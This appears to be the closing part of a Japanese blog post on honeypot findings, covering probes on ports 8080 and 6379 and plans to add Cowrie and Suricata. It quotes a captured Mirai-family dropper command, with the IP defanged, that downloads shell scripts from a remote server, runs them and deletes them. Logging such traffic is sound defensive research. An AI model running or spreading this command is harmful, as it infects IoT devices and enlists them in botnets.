shell[:]cd /data/local/tmp;wget hxxp[:]//207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp[:]//207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp[:]//207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp[:]//207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c
→ IoT を狙ったマルウェア(Mirai系)
8080ポート:
GET /
6379ポート:
PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12
SSH宛は調査行為止まりとなっており、実際にどのようなコマンドが打たれるかはハニーポット Cowrie を入れる必要があるかなと思いました。
Suricataの導入も検討しており、順次導入して分析の幅を広めていければと思います。
以上、ハニーポットの分析結果でした。